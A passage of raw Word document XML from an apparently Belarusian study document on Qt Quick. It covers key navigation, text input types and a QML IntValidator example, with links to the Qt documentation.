                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve">Там далей ідзе апісанне. Мы ў дадзеным тыпе вызначаем гэту далучаную ўласцівасць, дзе пазначаем які элемент павінен стаць актыўным пры </w:t>
            </w:r>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>націсканні той ці іншай стрэлкі.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="00C50BB7" w:rsidRDefault="00490E7E" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2277" w:history="1">
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>://</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>doc</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qt</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>io</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qt</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>-5/</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qml</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qtquick</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>keynavigation</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B54AE2" w:rsidRPr="00C50BB7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00252BF3" w:rsidRPr="00C50BB7" w:rsidRDefault="00252BF3" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00252BF3" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2278" w:history="1">
        <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-input-textinput.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRPr="00700D31" w:rsidRDefault="00B54AE2" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1917" w:name="_Toc483000945"/>
      <w:bookmarkStart w:id="1918" w:name="_Toc483003936"/>
      <w:bookmarkStart w:id="1919" w:name="_Toc483604288"/>
      <w:bookmarkStart w:id="1920" w:name="_Toc483605508"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Text Input Handling and Validators</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1917"/>
      <w:bookmarkEnd w:id="1918"/>
      <w:bookmarkEnd w:id="1919"/>
      <w:bookmarkEnd w:id="1920"/>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1921" w:name="text-visual-types"/>
      <w:bookmarkStart w:id="1922" w:name="_Toc483000946"/>
      <w:bookmarkStart w:id="1923" w:name="_Toc483003937"/>
      <w:bookmarkStart w:id="1924" w:name="_Toc483604289"/>
      <w:bookmarkStart w:id="1925" w:name="_Toc483605509"/>
      <w:bookmarkEnd w:id="1921"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text Visual Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1922"/>
      <w:bookmarkEnd w:id="1923"/>
      <w:bookmarkEnd w:id="1924"/>
      <w:bookmarkEnd w:id="1925"/>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>several types</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display text onto the screen. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2279" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type will display </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>formatted text</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> onto the screen, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2280" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextEdit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type will place a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multiline line edit</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> onto the screen, and the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2281" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">will place a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>single editable line</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> field onto the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To learn more about their specific features and properties, visit their respective documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1926" w:name="validating-input-text"/>
      <w:bookmarkStart w:id="1927" w:name="_Toc483000947"/>
      <w:bookmarkStart w:id="1928" w:name="_Toc483003938"/>
      <w:bookmarkStart w:id="1929" w:name="_Toc483604290"/>
      <w:bookmarkStart w:id="1930" w:name="_Toc483605510"/>
      <w:bookmarkEnd w:id="1926"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Validating Input Text</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1927"/>
      <w:bookmarkEnd w:id="1928"/>
      <w:bookmarkEnd w:id="1929"/>
      <w:bookmarkEnd w:id="1930"/>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>validator</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types enforce the type and format of</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2282" w:history="1">
        <w:r w:rsidRPr="00B54AE2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Column</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spacing</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text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text</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Enter a value from 0 to 2000"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextInput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focus</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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validator</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IntValidator</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bottom</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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top</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2000</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The validator types bind to</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextInput</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>validator</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
